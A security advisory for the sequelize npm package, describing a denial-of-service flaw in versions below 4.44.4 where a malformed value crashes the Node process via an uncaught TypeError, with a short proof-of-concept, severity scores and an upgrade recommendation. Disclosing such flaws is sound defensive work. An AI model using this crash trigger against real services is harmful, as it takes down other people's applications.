GHSA-fw4p-36j9-rrj3 – sequelize

Package

Manager: npm
Name: sequelize
Vulnerable Version: >=0 <4.44.4

Severity

Level: Medium

CVSS v3.1: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L/E:P/RL:U/RC:C

CVSS v4.0: CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

EPSS: N/A pctlN/A

Details

Denial of Service in sequelize Versions of `sequelize` prior to 4.44.4 are vulnerable to Denial of Service (DoS). The SQLite dialect fails to catch a `TypeError` exception for the `results` variable. The `results` value may be undefined and trigger the error on a `.map` call. This may allow attackers to submit malicious input that forces the exception and crashes the Node process. The following proof-of-concept crashes the Node process: ``` const Sequelize = require('sequelize'); const sequelize = new Sequelize({ dialect: 'sqlite', storage: 'database.sqlite' }); const TypeError = sequelize.define('TypeError', { name: Sequelize.STRING, }); TypeError.sync({force: true}).then(() => { return TypeError.create({name: "SELECT tbl_name FROM sqlite_master"}); }); ``` ## Recommendation Upgrade to version 4.44.4 or later.

Metadata

Created: 2020-09-03T20:25:33Z
Modified: 2020-08-31T18:48:48Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-fw4p-36j9-rrj3/GHSA-fw4p-36j9-rrj3.json
CWE IDs: ["CWE-248"]
Alternative ID: N/A
Finding: F140
Auto approve: 1